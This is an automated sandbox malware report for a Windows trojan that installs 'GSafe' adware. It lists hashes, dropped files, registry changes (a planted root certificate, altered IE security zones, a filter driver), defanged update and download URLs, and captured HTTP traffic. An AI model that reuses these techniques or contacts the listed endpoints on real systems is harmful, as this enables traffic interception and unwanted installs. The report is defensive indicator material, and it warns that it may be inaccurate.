Trojan.Win32.Delphi_b6f079be12

by malwarelabrobot on January 1st, 2015 in Malware Descriptions.

Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b6f079be120993d11a08a472b4e42c9d
SHA1: 87a9b9d5ba403571e0b5f118d1d40b5622516757
SHA256: d27673e5a6b4e58f900786526bb49290148c6cccdb9dc030cf867822fe97be9d
SSDeep: 768:s1cVhpQI2EQK0iPDh84nScF15GYbWjXO3XJV552/K alin2eFzbng2ask84h:KQpQ5EP0ijnRTXJV5k/K Yi2eFfgb84h
Size: 51976 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nj_update.exe:1544
GSafe.exe:832
GSafe.exe:1596
net1.exe:540
net1.exe:440
net1.exe:1100
net.exe:1236
net.exe:484
net.exe:240
%original file name%.exe:1244
gsafe_setup.exe:1800

The Trojan injects its code into the following process(es):

GSafe.exe:1268

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nj_update.exe:1544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\nsx85.tmp (1568 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (4 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\nsh84.tmp (0 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (0 bytes)
%WinDir%\Temp\nsx86.tmp (0 bytes)

The process GSafe.exe:832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\update[1].php (44 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] (22973 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.pvk (1 bytes)
%WinDir%\Temp\P_CheckUpdate.txt (44 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\nj_update.exe (18319 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_CheckUpdate.txt (0 bytes)
%WinDir%\Temp\P_RuleList.txt (0 bytes)

The process GSafe.exe:1268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_RuleList.txt (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (0 bytes)

The process %original file name%.exe:1244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gsafe_setup.exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst7E.tmp (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDP3RRYS\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2VMDU78I\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y9G7U7CL\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (0 bytes)

The process gsafe_setup.exe:1800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (55 bytes)
%Program Files%\GSafe\remove_GSafe.exe (1568 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy81.tmp (81025 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (782 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Program Files%\GSafe\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (11 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (6 bytes)
%Program Files%\GSafe\nfapi.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GSafe\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (0 bytes)
%Program Files%\GSafe\gfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (0 bytes)

Registry activity

The process nj_update.exe:1544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 1B 5D 50 F7 21 67 4E 69 17 52 91 DD 15 22 8F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayVersion" = "1.1.0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GSafe]
"Version" = "1.1.0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The process GSafe.exe:832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\GSafe]
"instid" = "2rLVemqiV8QPrfThkbebR75aYB35Y4gu"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\gfilterdrv]
"Tag" = "9"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A6FBE8F491681C4D381A094958E89BD8A84108E2]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 A6 FB E8 F4"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 3E 31 84 2A 84 10 E2 5C 3C 59 C1 19 5B B9 F8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"A6FBE8F491681C4D381A094958E89BD8A84108E2"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

The process GSafe.exe:1596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B A6 24 78 3F FD BB 27 9D D7 0A B8 EC 4A 3E 28"

The process GSafe.exe:1268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 44 6E 90 B5 D5 96 9C 44 4B 23 98 59 DA 4D 8A"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process net1.exe:540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC BA DB 8A F7 0E 7E 45 9D E7 10 84 79 54 4A EA"

The process net1.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 C8 CA 09 CA 0A D2 11 29 49 83 10 EA 71 6F A3"

The process net1.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 85 54 67 57 69 7F 8E FE 87 C2 69 62 93 D2 E6"

The process net.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 8E 98 A6 22 0C 5D 90 AF 0E 8C 98 F3 F9 BF 43"

The process net.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 93 6B 55 C5 52 13 64 11 F7 B9 89 0D 3B 81 68"

The process net.exe:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 2E FC B6 45 6C 20 A9 C0 64 F1 E2 42 4B 52 62"

The process %original file name%.exe:1244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 1E C6 BC 65 07 AD 98 6E B1 42 6D E4 D1 CF 96"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process gsafe_setup.exe:1800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D2 52 06 9D 60 9E 76 4B B4 AE 11 6C 9D 56 48"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GSafe]
"affid" = "hdtv"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Comments" = "Browse safe, securely and do your best searches online"
"UninstallString" = "%Program Files%\GSafe\remove_GSafe.exe /S"
"DisplayVersion" = "1.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayName" = "GSafe"
"QuietUninstallString" = "%Program Files%\GSafe\remove_GSafe.exe /S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Publisher" = "GENCO LABS LLC"

[HKLM\SOFTWARE\GSafe]
"Version" = "1.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
0661995db9d56791723702f4ea94c5fb c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1]
3a0c5503294cd43c59df4279d2b72d8d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe
1690feeae024a4584ea1d97c07dee78e c:\Program Files\GSafe\GSafe.exe
9155cce4d8c0daf7b4d4c1ada945ce54 c:\Program Files\GSafe\ProtocolFilters.dll
3e1176c39139baf084e9a69d6d50438a c:\Program Files\GSafe\libeay32.dll
9ff0b75dfb43d58f9d2ebe2697b529c4 c:\Program Files\GSafe\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files\GSafe\nfregdrv.exe
bd67f6e7a304f684b3513b3a9c535143 c:\Program Files\GSafe\remove_GSafe.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files\GSafe\ssleay32.dll
0661995db9d56791723702f4ea94c5fb c:\WINDOWS\Temp\nj_update.exe
a4b60de83b790c9aa86a367eedc3af2a c:\WINDOWS\system32\drivers\gfilterdrv.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23130 23552 4.44841 0bc2ffd32265a08d72b795b18265828d
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 110488 1024 3.26405 975304d6dd6c4a4f076b15511e2bbbc0
.ndata 147456 32768 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 180224 2536 2560 3.13573 e844fdd69bdbb3983f3935842639207a

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 111
fe19430e206762bb2e9b7a8eda606fd5
85f9955ab6934d697288afd27dc7a58c
b3e92e650e999225a6bcdb3f02de6978
cb4a17cbf388b6948f137d6ebec938a3
d54c4d7cc93b9cd1df7ed6e502496d89
513f348df39c996229766bb0643038d8
c3bbb39ced8892724124da1b0c590e36
ff5fc30bb03f0539b766d88853d3cafc
dcfe26b4d104544bfbca806dd835ee5e
c9ef48ddcc60d7fd75bfbbd11372428f
3c401a3f1acb19112187a86d704428b2
422966a56e088b291ba42264431ed8f5
84896e31abdc7c299ba1cf27c2857e2e
883ea9e858595dfb411cbc9a5d0eb496
2f40b14a6d586464338f1867dc4f6bd2
0605a356bf1c88c1a8b838819afdbb43
7b799bda39cde1f9759fa8c2a79c49cb
edaf8e666446f746cecd150d29a7688f
ca829f86af0a8b02dfa65dbd4d4721c9
e967a0b717d494b8291639d8a0e46344
a848c2b153e8fb4dd27bdaf6dc42e860
75c60a885096fc4cee2e4fa9357044b5
18b197ab50049e884e346f38c4fab398
ea4fd2a497d37e841cbda16b73520c25
1127efcd3bf48bb7b3b4ad29da66bed9

URLs

URL IP
hxxp://www.gencolabsllc.com/services/hdtv_rules.php
hxxp://www.gencolabsllc.com/services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404
hxxp://www.gencolabsllc.com/bin/gsafe_update.exe?dummy=573
hxxp://gencolabsllc.com/bin/gsafe_update.exe?dummy=573


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:25 GMT
Content-Type: text/plain
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
hXXp://gencolabsllc.com/bin/gsafe_update.exe..



GET /services/hdtv_rules.php HTTP/1.0
Accept: */*
